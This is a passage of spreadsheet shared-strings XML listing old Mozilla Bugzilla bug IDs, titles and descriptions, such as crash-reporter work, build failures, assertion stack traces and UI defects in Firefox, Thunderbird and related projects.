implement crash display in tb advanced prefs v1
On a plane flight last week I got about:crashes mostly working in Thunderbird.  It doesn't yet have the CSS love that it might (should probably really be using a XUL window here)...</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-338759</t>
  </si>
  <si>
    <t>Remove dead key event/text input code from widget/src/mac following bug 337199</t>
  </si>
  <si>
    <t>There's some unreachable code that needs to be killed.  It wasn't killed in bug 337199 to keep the complexity down.  This bug amounts to cleanup.
Bug 337199 comment 22:
&gt; There will be a followup cleanup patch to get rid of dead code like
&gt; HandleKeyEvent and HandleUpdateInputArea.</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-741798</t>
  </si>
  <si>
    <t>Code Quality</t>
  </si>
  <si>
    <t>Convert upload/tests to use model makers.</t>
  </si>
  <si>
    <t>users.json and questions.json are being used.</t>
  </si>
  <si>
    <t>berker.peksag</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-431507</t>
  </si>
  <si>
    <t>Specification of an affiliate redirection URL with each new affiliate banner.</t>
  </si>
  <si>
    <t>Hello
Would you please review the attached patch which allows an administrator to specify an affiliate redirection URL with each affiliate banner. 
Regards Paul</t>
  </si>
  <si>
    <t>FIREFOX-246779</t>
  </si>
  <si>
    <t>Can't select a custom location and name for Start Menu folder</t>
  </si>
  <si>
    <t>When I am installing Firefox I would like to be able to select where to install
the Start Menu folder for Firefox icons and choose its name.
Reproducable: always
Steps to reproduce:
1. run the Firefox installer
Current results:
Firefox installer newer asks you about the location and name of the Start menu
folder. It always just creates them in C:\Documents and Settings\All
Users\Start Menu\Programs and names it Mozilla Firefox.
Expected results:
Firefox installer should ask you where to put the folder and what name should it
have. So that it would be possible to create the folder in C:\Documents and
Settings\All Users\Start Menu\Programs\Internet and name it Firefox for example.</t>
  </si>
  <si>
    <t>SEAMONKEY-107287</t>
  </si>
  <si>
    <t>(QFA)Talkback error: Can't initialize.</t>
  </si>
  <si>
    <t>This happens every time with Build ID 2001102806 on Linux:
% mozilla
/usr/local/mozilla/run-mozilla.sh /usr/local/mozilla/mozilla-bin
MOZILLA_FIVE_HOME=/usr/local/mozilla
  LD_LIBRARY_PATH=/usr/local/mozilla:/usr/local/mozilla/plugins
     LIBRARY_PATH=/usr/local/mozilla:/usr/local/mozilla/components
       SHLIB_PATH=/usr/local/mozilla
          LIBPATH=/usr/local/mozilla
       ADDON_PATH=/usr/local/mozilla
      MOZ_PROGRAM=/usr/local/mozilla/mozilla-bin
      MOZ_TOOLKIT=
        moz_debug=0
     moz_debugger=
(QFA)Talkback error: Can't initialize.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Otherwise mozilla seems to work ok.</t>
  </si>
  <si>
    <t>slogan</t>
  </si>
  <si>
    <t>TOOLKIT-461856</t>
  </si>
  <si>
    <t>No Username on windows mobile.</t>
  </si>
  <si>
    <t>There is no call on windows mobile to get the user name.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-338513</t>
  </si>
  <si>
    <t>Change default bug owner for Core/XForms</t>
  </si>
  <si>
    <t>Could you please change the default bug owner for Core/XForms to be xforms@core.bugs instead of Aaron?</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-481303</t>
  </si>
  <si>
    <t>Design new schema for database table for storing l10n dashboard data</t>
  </si>
  <si>
    <t>We'll be adding a table to the current SUMO database instead of relying on the tracker functionality built into tikiwiki.
What will need to be stored in the table can be found under the second item of this list https://wiki.mozilla.org/Support/l10nPriorityPRD#Implementation 
I'll have a suggested schema attached shortly.</t>
  </si>
  <si>
    <t>TOOLKIT-384034</t>
  </si>
  <si>
    <t>update to breakpad revision 189</t>
  </si>
  <si>
    <t>We need to update to breakpad revision 189 to pick up my fix to the Linux exception handler.  There are probably some other fixes in there as well.  This should give us functional minidump generation under Linux.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-435134</t>
  </si>
  <si>
    <t>Connection problems to netapp's causing corruption of tinderbox file systems</t>
  </si>
  <si>
    <t>On http://tinderbox.mozilla.org/showbuilds.cgi?tree=Mozilla1.8 the following machines are burning. Interesting they all started burning around 05:57am-06:10am this morning. Even though they all give different errors the timing makes me wonder if these machines are failing for a related reason?
 balsa-18branch
  http://tinderbox.mozilla.org/showlog.cgi?log=Mozilla1.8/1211416560.1211416689.25547.gz&amp;fulltext=1 ends with:
  cvs checkout: cannot open directory /cvsroot/:ext:ffxbld@cvs.mozilla.org:/cvs: No such file or directory
  cvs checkout: skipping directory mozilla/extensions/webdav/tests
 crazyhorse 
  http://tinderbox.mozilla.org/showlog.cgi?log=Mozilla1.8/1211415900.1211416021.23668.gz&amp;fulltext=1 ends with:
   cc1plus: internal compiler error: Segmentation fault
 prod-pacifica-vm
  http://tinderbox.mozilla.org/showlog.cgi?log=Mozilla1.8/1211415600.1211416259.24280.gz&amp;fulltext=1 ends with:
  ../../dist/lib/gkxtfbase_s.lib : fatal error LNK1136: invalid or corrupt file</t>
  </si>
  <si>
    <t>FIREFOX-397506</t>
  </si>
  <si>
    <t>Track Firefox localization work load between releases towards 3.0</t>
  </si>
  <si>
    <t>Similar to bug 339000 I'm going to create diffs to visualize the workload to get a 3.0 localization off of an existing 2.0 one.
I'm tempted to start with Alpha 8 I'll take a closer look shortly at what Alpha 8 actually is source-wise.
I'm choosing a real Firefox bug this time somewhat intentional. This should be low traffic so I'm not too worried about spamming folks watching the firefox qa alias.</t>
  </si>
  <si>
    <t>CORE-396936</t>
  </si>
  <si>
    <t>FLAGP_TO_THING not typesafe in C++</t>
  </si>
  <si>
    <t>Created attachment 281696
Fix FLAGP_TO_THING rev. 1
Uses of FLAGP_TO_THING macro don't compile in C++ unless you cast the result to JSGCThing*. But since all uses actually want a JSGCThing* we should just make the macro do the work. This fixes a mozilla-central compile error intoduced by bug 394709</t>
  </si>
  <si>
    <t>CORE-494346</t>
  </si>
  <si>
    <t>STATE_FOCUSABLE not exposed on focusable video sliders</t>
  </si>
  <si>
    <t>Found after bug 490287 landed. NVDA does not properly go into focus mode because the sliders although focusable don't expose the focusable state.</t>
  </si>
  <si>
    <t>CORE-243902</t>
  </si>
  <si>
    <t>about:plugins includes a link to netscape</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040514 MultiZilla/1.6.2.0a
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040514
Near the top about:plugins has a line that says: Find more information about
browser plug-ins at Netscape.com. with the Netscape.com linking to
http://home.netscape.com/plugins/index.html  Shouldn't we remove this since
Mozilla is no longer affiliated with Netscape?
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>jessw</t>
  </si>
  <si>
    <t>BUGZILLA-97729</t>
  </si>
  <si>
    <t>Uploaders need to be able to obsolete their own attachments</t>
  </si>
  <si>
    <t>Users who have uploaded attachments should be able to mark the obsolete flag on
attachments they uploaded.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-519579</t>
  </si>
  <si>
    <t>Set up buildbot etc on bm-xserve21 after reimage</t>
  </si>
  <si>
    <t>CORE-392359</t>
  </si>
  <si>
    <t>Some values of pointer-events not working</t>
  </si>
  <si>
    <t>Created attachment 276811
force hit testing when needed
The addition of containing rects to avoid unnecessary work broke some values of pointer-events in some circumstances because the rect will not get initialized.
See test cases on bug 347374 and this portion of the spec:
  http://www.w3.org/TR/SVG11/interact.html#PointerEventsProperty</t>
  </si>
  <si>
    <t>SEAMONKEY-341031</t>
  </si>
  <si>
    <t>[BEOS] Use real process directory instead getenv(MOZILLA_FIVE_HOME)</t>
  </si>
  <si>
    <t>There are probably more places (besides xpcom/glue) were we using getenv() instead getting real process dir. IMHO all such places must be set to use get_next_image_info() at higher priority.
One is
http://lxr.mozilla.org/seamonkey/source/xpcom/obsolete/nsSpecialSystemDirectory.cpp#296</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-342074</t>
  </si>
  <si>
    <t>JSD crashes on exit (in debug somewhere else in opt) when there's two clients [@ JSD_ASSERT_VALID_CONTEXT]</t>
  </si>
  <si>
    <t>jsdService::Pause should nullcheck mCx
I'll try to get a patch finished tonight.
I fail at noting the crasher frame correctly in the summary. Someone with time &amp; knowledge please fix. Stack attached shortly.</t>
  </si>
  <si>
    <t>CORE-213753</t>
  </si>
  <si>
    <t>[ps] Runtime bloat in gfx/src/ps/nsPostScriptObj.cpp from fprintf()s</t>
  </si>
  <si>
    <t>nsPostScriptObj.cpp contains a sequence of over 1300 calls to fprintf() each
printing a one-line string. This contributes around 32k to the runtime code size
on linux (about 45k on solaris) contrasted with using a single fprintf() call.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-333619</t>
  </si>
  <si>
    <t>select generating too many messages</t>
  </si>
  <si>
    <t>With the reorganizing of xf:select we are now generating too many events for xforms-binding-exceptions and xforms-select and xforms-deselect when we have message popups.  That is because we are going through the event generation codepath for blur when the control is incremental.  We really shouldn't do anything if the select is incremental and it loses focus.  The current value should already be correct.</t>
  </si>
  <si>
    <t>TOOLKIT-319319</t>
  </si>
  <si>
    <t>MyWebSearch spyware toolbar breaks the browser with a large grey bar at the bottom of the screen</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Large area under the status bar.  Appears the browser window is incorrectly placing the status bar.  There is a red upward facing arrow on the left side of the large area.  This bug is similar to but not the same as 309495 &amp; 298874.  This first appeared after I upgraded from 1.0 to 1.5.  I have since uninstalled Firefox 3 times and reinstalled it and the area still appears.  
Reproducible: Always
Steps to Reproduce:
1. Open the browser thats all.
2.
3.
Actual Results:  
Large area appears under the status bar.
This was not happening in prior version.  This may or may be playing a factor but on my machine my userid is XSXBTSO.  Because of a earlier non-browser related issue another account got created and it was named XSXBTSO.000 I don't know if the simliarities between account names is confusing it or not.</t>
  </si>
  <si>
    <t>scottjburrows</t>
  </si>
  <si>
    <t>CORE-309894</t>
  </si>
  <si>
    <t>Avoid nested js_Interpret for XML filtering predicate expression</t>
  </si>
  <si>
    <t>See bug 309852 comment 5.  This will mean a bytecode incompatibility so the XDR
script version magic needs to change.  Adding js1.6 keyword so we can consider
whether that implies getting it fixed in the 1.8 branch.
/be</t>
  </si>
  <si>
    <t>NSPR-29632</t>
  </si>
  <si>
    <t>NSPR 4.0 bug fixes</t>
  </si>
  <si>
    <t>This report tracks the bug fixes in NSPR 4.0.</t>
  </si>
  <si>
    <t>DIRECTORY-1984</t>
  </si>
  <si>
    <t>Crashes on NT when doing many searches</t>
  </si>
  <si>
    <t>From: Schneider Stuart 
   Just wanted to pass along another update while trying to use PerLDAP on
an NT4 system.
   After I started converting some of my scripts from Net::LDAPapi to the
new modules I came across a problem where the new library would blow up and
return an Error: Runtime exception after performing between 200 to 5000
searches on the directory.  I've since installed a C compiler on my system
and have been seeing the exact same problem with v1.1 of the modules.  I've
managed to track the call down to the ldap_value_free call made at the
conclusion of the ldap_search_s XS function call.
   As a temporary fix I've commented out the call to ldap_value_free in the
API.xs file and my scripts now work perfectly (although I do notice a memory
leak when running the script - after about 20000 queries the script is
consuming an additional 5meg of memory).
   What additional information can I provide to help track this down?
Personally I'm leaning towards the possibility that this is a bug in
Netscape's LDAP library for the Win32 platform since the same code works
perfectly on my RedHat Linux system.  Unfortunately I have to run this on
Win-NT.
Stuart Schneider
Stuart.Schneider@pacificorp.com</t>
  </si>
  <si>
    <t>CALENDAR-412817</t>
  </si>
  <si>
    <t>Improve ASSERT macro output or remove the macro</t>
  </si>
  <si>
    <t>Currently the ASSERT macro output from calUtils.js is very useless compared to direct logging. The console output always looks like:
    Error: Assert failed: timezone not available: /BasicTimezones/GMT
    1: ASSERT
    2: newDateTime
    3: 
    4: 
    5: getItems
    Source File: file:///D:/sunbird/js/calUtils.js Line: 781
    Error: Assert failed: [calAlarmService] Could not determine
    alarm time for item: My task
    1: ASSERT
    2: 
    3: 
    4: onGetResult
    5: queueItems
    Source File: file:///D:/sunbird/js/calUtils.js Line: 781
Actual Results:
- The file and location where the error occurred is not visible from it
- The provided link just opens calUtils.js file where ASSERT is implemented
- one need to scan the stack trace to find a meaningful function name
- one need to search the code for the function definition and location
- if the function exists multiple times guess what function is the correct one (e.g. getItems from above is defined 8 times)
- one need to open the file go to the function and search for the ASSERT location to the source code in question
Expected Results:
The error message contains the original file and location. Clicking on it opens the correct source file on the correct location.
Please improve the ASSERT macro output or remove the macro and just report to console directly.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-529989</t>
  </si>
  <si>
    <t>Collect email addresses and send them to Socorro with reports</t>
  </si>
  <si>
    <t>Sam says that Socorro is storing email addresses again and he's filed bug 529986 to get that info exposed in reports when you're logged in.  We should start collecting them and sending them to Socorro.
I think I recall Stuart saying that there was some plist key or something that seemed simple to me that controlled whether the email UI showed up.  Stuart please correct my recollection.  If it's not too difficult I'd really like it in 2.0.1.
We'd also have to fix the privacy policy URL it's hard-coded in the Localizable.strings file to http://www.google.com/privacypolicy.html but I think the benefit of having emails outweighs the l10n hit for 2.0.1.  (It'd be great if ultimately upstream that URL became configurable somewhere outside of the .strings file so consumers didn't have to fork the file but it's an easier fork.)</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-436841</t>
  </si>
  <si>
    <t>Einige Ãœbersetzungen welche im Rahmen von Spicebird gemacht wurden</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 fr rv:1.9b5) Gecko/2008050509 Firefox/3.0b5
Build Identifier: Trunk 12.04.2008
Dies sind alle Ãœbersetzungen und Verbesserungen welche an Thunderbird-Dateien gemacht wurden. 
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>fred.jen</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-732650</t>
  </si>
  <si>
    <t>Request for an Apps component under Firefox for the Web Apps Integration into Desktop Feature</t>
  </si>
  <si>
    <t>Currently bugs for the Web Apps Integration into Desktop are being tracked under Firefox General (tracking bug here: https://bugzilla.mozilla.org/show_bug.cgi?id=731054). Soon we'll be migrating bugs from the Web Apps product in the extension component into firefox and would like to place them in an Apps specific place. Therefore this bug requests for a component to be added to Firefox called Apps for the Web Apps Integration Into Desktop feature.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-325997</t>
  </si>
  <si>
    <t>merge ah@numerik.uni-kiel.de with axel@pike.org</t>
  </si>
  <si>
    <t>Sadly I can't get to my ah@numerik.uni-kiel.de account (that email is dead for
quite some time) could you please set the mailing address of it to 
email@axel-hecht.de and add a 
(DON'T USE THIS)
suffix to the real name?
Thanks</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-440991</t>
  </si>
  <si>
    <t>fedexkinkos.com - Cannot upload file (site relies on full path information no longer available in Gecko 1.9.x browsers)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Gives a bad file name error.  Does not happen in other Firefox releases or IE.
Reproducible: Always
Steps to Reproduce:
1. https://printonline.fedexkinkos.com/StartNewJob.do
2. Browse
3. Add file to job list
Actual Results:  
Gives a bad file name error.</t>
  </si>
  <si>
    <t>swanson.michael</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-213699</t>
  </si>
  <si>
    <t>Write PAC docs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 5.01 Windows NT 5.0)
Build Identifier: 
auto-proxy file format specification :
( http://wp.netscape.com/eng/mozilla/2.0/relnotes/demo/proxy-live.html )
states that daterange() can handle those
combinations of arguments:
88
dateRange(day)
dateRange(day1 day2)
dateRange(mon)
dateRange(month1 month2)
dateRange(year)
dateRange(year1 year2)
dateRange(day1 month1 day2 month2)
dateRange(month1 year1 month2 year2)
dateRange(day1 month1 year1 day2 month2 year2)
dateRange(day1 month1 year1 day2 month2 year2
gmt)
[...]
Even though the above examples don't show the GMT
parameter can be specified in any of the 9 (sic!)
different call profiles always as the last parameter.
88
In the examples section there is one call that doesn't
match these call profiles:
88
This statement is true on the 24th of December 1995.
dateRange(24 DEC 1995) 
88
Is the call profile collection incomplete or is this
a fake example? Could anyone please shed some light
into this matter?
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>dmcdonald999</t>
  </si>
  <si>
    <t>maxnitribitt</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-359323</t>
  </si>
  <si>
    <t>static pages on tinderbox-stage are busted</t>
  </si>
  <si>
    <t>The static pages on tinderbox-stage (which we've often encouraged people to link to because they're less load on the server and they tend to load faster) are quite busted.
The following four pages should all look the same:
http://tinderbox-stage.mozilla.org/SeaMonkey/
http://tinderbox-stage.mozilla.org/showbuilds.cgi?tree=SeaMonkey
http://tinderbox.mozilla.org/SeaMonkey/
http://tinderbox.mozilla.org/showbuilds.cgi?tree=SeaMonkey
However the first one is:
 * missing the header at the top
 * has *tons* of extra columns with seemingly everything ever associated with that tinderbox page
Sorry I didn't notice this earlier -- these pages are bookmarked / linked to a bit but they're not easily accessible through the UI.  I think this probably should block the migration to the tinderbox-stage server.
(There are also slight differences between which columns are present on the showbuilds.cgi versions between tinderbox and tinderbox-stage but I'd hope that's an issue that would be fixed in a final data sync -- although I'd have thought we'd be syncing that with reasonable frequency.)</t>
  </si>
  <si>
    <t>MOZILLA.ORG-521259</t>
  </si>
  <si>
    <t>Kill dead discussion groups</t>
  </si>
  <si>
    <t>Please kill the following discussion forums in all their forms (mailing list/newsgroup/Google Group).
mozilla.web-developers.general
mozilla.dev.ajax
mozilla.dev.tech.javascript
mozilla.dev.apps.minimo
mozilla.dev.general.it
mozilla.dev.web-development
mozilla.mdc.devnews
mozilla.mdc.webwatch
mozilla.support.screenshots
mozilla.community.mozpad
mozilla.community.enterprise
mozilla.dev.apps.camino
mozilla.dev.apps.other
mozilla.support.mozilla-suite
Messages of deletion have been posted in all of them several weeks ago and only in one case was one objection raised. I considered it and decided to proceed.
Gerv</t>
  </si>
  <si>
    <t>CORE-492217</t>
  </si>
  <si>
    <t>Incorrect direction of hierarchical tree bullets in RTL trees on Mac</t>
  </si>
  <si>
    <t>Created attachment 376578
Screenshot
The bullets need to be reversed in the closed state see the screenshot attached.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-106542</t>
  </si>
  <si>
    <t>Ability to perform normal link operations on chatzilla links</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:0.9.5+)
Gecko/20011023
BuildID:    2001102309
Right now chatzilla html-ifies hyperlinks that are seen in the message window.
 However the only thing I can do with them is left click and that opens the
link in a random currently open browser window (a destructive action and a
personal pet peeve).
Html links should get all the link attrbutes that they do in the mailnews
client.  This includes middle-click to open in a new window and a context menu
with such items as open in new window copy link address etc.
Reproducible: Always
Steps to Reproduce:
1.open chatzilla and go to a room
2.wait for someone to type in a hyperlink
3.middle click or right click on a link
Actual Results:  nothing happens.
Expected Results:  middle click should open in a new window and right click
should bring up a context menu.</t>
  </si>
  <si>
    <t>bruppel1</t>
  </si>
  <si>
    <t>CORE-135278</t>
  </si>
  <si>
    <t>nsDependentSingleFragmentCSubstring assertions</t>
  </si>
  <si>
    <t>I am hitting an assertion when nsGenericDOMDataNode::GetData() has to return
am empty string. There is a comment in the code that seems to suggest that such 
problems were anticipated but there is apparently no protection for the case of 
nsDependentSingleFragmentCSubstring.
See also bug 121925 - nsDependentCString assertions.
Code from where the assertion is originating:
=============================================
nsresult
nsGenericDOMDataNode::GetData(nsAString&amp; aData)
{
  if (mText.Is2b()) {
    aData.Assign(mText.Get2b() mText.GetLength())
  } else {
    // Must use Substring() since nsDependentCString() requires null
    // terminated strings.
    const char *data = mText.Get1b()
    CopyASCIItoUCS2(Substring(data data + mText.GetLength()) aData)
  }
  return NS_OK
}
Stack trace:
============
NTDLL! 77f9eea9()
nsDebug::Assertion(const char * 0x101073e4 `string' const char * 0x10107284 
`string' const char * 0x101073a8 `string' int 203) line 291 + 13 bytes
nsDependentSingleFragmentCSubstring::Rebind(const char * 0x00000000 const char 
* 0x00000000) line 203 + 37 bytes
nsDependentSingleFragmentCSubstring::nsDependentSingleFragmentCSubstring(const 
char * 0x00000000 const char * 0x00000000) line 216 + 51 bytes
Substring(const char * const &amp; 0x00000000 const char * const &amp; 0x00000000) line 
282 + 21 bytes
nsGenericDOMDataNode::GetData(nsAString &amp; {...}) line 437 + 40 bytes
nsTextNode::GetData(nsTextNode * const 0x03d9c69c nsAString &amp; {...}) line 59 + 
18 bytes
XPTC_InvokeByIndex(nsISupports * 0x03d9c69c unsigned int 28 unsigned int 1 
nsXPTCVariant * 0x0012d5f0) line 106
XPCWrappedNative::CallMethod(XPCCallContext &amp; {...} XPCWrappedNative::CallMode 
CALL_GETTER) line 2025 + 42 bytes
XPCWrappedNative::GetAttribute(XPCCallContext &amp; {...}) line 1823 + 14 bytes
XPC_WN_GetterSetter(JSContext * 0x03b4f2a8 JSObject * 0x03cdb110 unsigned int 
0 long * 0x03c8540c long * 0x0012d8e0) line 1298 + 12 bytes
js_Invoke(JSContext * 0x03b4f2a8 unsigned int 0 unsigned int 2) line 788 + 23 
bytes
js_InternalInvoke(JSContext * 0x03b4f2a8 JSObject * 0x03cdb110 long 63811992 
unsigned int 0 unsigned int 0 long * 0x00000000 long * 0x0012e6e0) line 880 + 
20 bytes
js_GetProperty(JSContext * 0x03b4f2a8 JSObject * 0x03cdb110 long 25483168 
long * 0x0012e6e0) line 2502 + 45 bytes
js_Interpret(JSContext * 0x03b4f2a8 long * 0x0012e890) line 2576 + 2032 bytes
js_Invoke(JSContext * 0x03b4f2a8 unsigned int 1 unsigned int 2) line 805 + 13 
bytes
js_InternalInvoke(JSContext * 0x03b4f2a8 JSObject * 0x03a3e538 long 61074728 
unsigned int 0 unsigned int 1 long * 0x0012eae8 long * 0x0012e9b8) line 880 + 
20 bytes
JS_CallFunctionValue(JSContext * 0x03b4f2a8 JSObject * 0x03a3e538 long 
61074728 unsigned int 1 long * 0x0012eae8 long * 0x0012e9b8) line 3412 + 31 
bytes
nsJSContext::CallEventHandler(nsJSContext * const 0x017c60a8 void * 0x03a3e538 
void * 0x03a3ed28 unsigned int 1 void * 0x0012eae8 int * 0x0012eaec int 0) 
line 1016 + 33 bytes
nsJSEventListener::HandleEvent(nsJSEventListener * const 0x03d05748 nsIDOMEvent 
* 0x032b45e8) line 180 + 77 bytes
nsEventListenerManager::HandleEventSubType(nsListenerStruct * 0x03c60d28 
nsIDOMEvent * 0x032b45e8 nsIDOMEventTarget * 0x03cadd90 unsigned int 1 
unsigned int 7) line 1217 + 20 bytes
nsEventListenerManager::HandleEvent(nsEventListenerManager * const 0x03d85768 
nsIPresContext * 0x03db4da0 nsEvent * 0x0012f278 nsIDOMEvent * * 0x0012f1d4 
nsIDOMEventTarget * 0x03cadd90 unsigned int 7 nsEventStatus * 0x0012f2a0) line 
1890 + 36 bytes
GlobalWindowImpl::HandleDOMEvent(GlobalWindowImpl * const 0x03cadd80 
nsIPresContext * 0x03db4da0 nsEvent * 0x0012f278 nsIDOMEvent * * 0x0012f1d4 
unsigned int 1 nsEventStatus * 0x0012f2a0) line 697
DocumentViewerImpl::LoadComplete(DocumentViewerImpl * const 0x03d82338 unsigned 
int 0) line 1396 + 56 bytes
nsDocShell::EndPageLoad(nsIWebProgress * 0x0391ebfc nsIChannel * 0x03965e10 
unsigned int 0) line 3878
nsWebShell::EndPageLoad(nsIWebProgress * 0x0391ebfc nsIChannel * 0x03965e10 
unsigned int 0) line 731
nsDocShell::OnStateChange(nsDocShell * const 0x0394d2ec nsIWebProgress * 
0x0391ebfc nsIRequest * 0x03965e10 int 131088 unsigned int 0) line 3795
nsDocLoaderImpl::FireOnStateChange(nsIWebProgress * 0x0391ebfc nsIRequest * 
0x03965e10 int 131088 unsigned int 0) line 1105
nsDocLoaderImpl::doStopDocumentLoad(nsIRequest * 0x03965e10 unsigned int 0) 
line 744
nsDocLoaderImpl::DocLoaderIsEmpty() line 642
nsDocLoaderImpl::DocLoaderIsEmpty() line 645
nsDocLoaderImpl::OnStopRequest(nsDocLoaderImpl * const 0x03d19fcc nsIRequest * 
0x03c587d0 nsISupports * 0x00000000 unsigned int 0) line 573
nsLoadGroup::RemoveRequest(nsLoadGroup * const 0x03d1a0a0 nsIRequest * 
0x03c587d0 nsISupports * 0x00000000 unsigned int 0) line 526 + 35 bytes
nsStreamIOChannel::OnStopRequest(nsStreamIOChannel * const 0x03c587d4 
nsIRequest * 0x03c588fc nsISupports * 0x00000000 unsigned int 0) line 486
nsOnStopRequestEvent::HandleEvent() line 213
nsARequestObserverEvent::HandlePLEvent(PLEvent * 0x03d259dc) line 116
PL_HandleEvent(PLEvent * 0x03d259dc) line 596 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x010c3068) line 526 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x008903b4 unsigned int 49488 unsigned int 0 
long 17576040) line 1077 + 9 bytes
USER32! 77e148dc()
USER32! 77e14aa7()
USER32! 77e266fd()
nsAppShellService::Run(nsAppShellService * const 0x017991e8) line 309
main1(int 1 char * * 0x00304e70 nsISupports * 0x00000000) line 1415 + 32 bytes
main(int 1 char * * 0x00304e70) line 1763 + 37 bytes
mainCRTStartup() line 338 + 17 bytes</t>
  </si>
  <si>
    <t>CORE-337469</t>
  </si>
  <si>
    <t xml:space="preserve"> hides text when padding value is high.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060508 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060508 Minefield/3.0a1
See testcase.
This is NOT a regression.
Reproducible: Always</t>
  </si>
  <si>
    <t>nir123</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-348819</t>
  </si>
  <si>
    <t>[docs] Custom control documentation should be updated</t>
  </si>
  <si>
    <t>When next xforms version will be ready to ship then we should update Custom Control documentation at http://developer.mozilla.org/en/docs/XForms:Custom_Controls.
1) I guess we should tell about @typelist attribute.
2) We should provide info about our base bindings. Now example on Custom Controls page can be simplified since it can be inherited from 'xformswidget-output-base'.
3) It's better to put other example because current one is wheel invoking since output[mediatype] will be in xforms package.
4) We should provide a link to see how the example work.
5) It's better to have examples for xhtml and xul both.
6) We should say that user can extend only standard widgets in nice way. And he should use types or mediatype in common case for that.
7) And if he wants to put new widgets (of non xforms tagname or namespace) then it can do some magic by placing xf:input and etc into his widget since bug 306526 is not fixed and nobody knows when it will be :).
8) And at the end we should say about what xforms version we write this all.
I guess we should tell all about our xforms controls creating practice :). Thoughts?</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-485336</t>
  </si>
  <si>
    <t>uploadsymbols failures when mozilla-central &amp; tracemonkey upload at same time</t>
  </si>
  <si>
    <t>Hit this a couple of times recently eg 
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1238061720.1238064888.5771.gz
...
  inflating: libalerts_s.dylib/AFFC07027E0971FFED4931FBDE77F71B0/libalerts_s.dylib.dSYM.tar.bz2  
  error:  invalid compressed data to inflate
 bad CRC 00000000  (should be 4c73b72c)
file #17:  bad zipfile offset (local header sig):  598050
file #18:  bad zipfile offset (local header sig):  612710
I tried uploading that to stage and unzipping there and had no problems same on the bm-xserve16 itself. Transmission errors ?
Similar problem in the Mar 23 nightly bm-xserve19.
Any ideas Ted ? Or should be push this over to server ops to check on dm-symbolpush01.mozilla.org ?</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-250768</t>
  </si>
  <si>
    <t>Removing a feed from the subscriptions dialog doesn't really remove it</t>
  </si>
  <si>
    <t>The next time I start up after removing a feed I still see it in the
subscription UI. The folder has been properly cleaned up though.</t>
  </si>
  <si>
    <t>PLUGINS_GRAVEYARD-450663</t>
  </si>
  <si>
    <t>Java_JEPCookieHandler_getCookie does things on the wrong thread</t>
  </si>
  <si>
    <t>Created attachment 333825
stack traces for two of the assertions
Steps:
1. Load http://library.thinkquest.org/15413/history/music-history.htm in a Mac trunk debug build
Result: gobs of wrong-thread assertions.
###!!! ASSERTION: Using observer service off the main thread!: 'Error' file /Users/jruderman/central/xpcom/ds/nsObserverService.cpp line 176
###!!! ASSERTION: nsCookie not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/netwerk/cookie/src/nsCookie.cpp line 159
###!!! ASSERTION: nsCookieService not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/netwerk/cookie/src/nsCookieService.cpp line 405
###!!! ASSERTION: nsGlobalWindow not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/dom/src/base/nsGlobalWindow.cpp line 957
###!!! ASSERTION: nsGlobalWindow not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/dom/src/base/nsGlobalWindow.cpp line 959
###!!! ASSERTION: nsPluginHostImpl not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/modules/plugin/base/src/nsPluginHostImpl.cpp line 2723
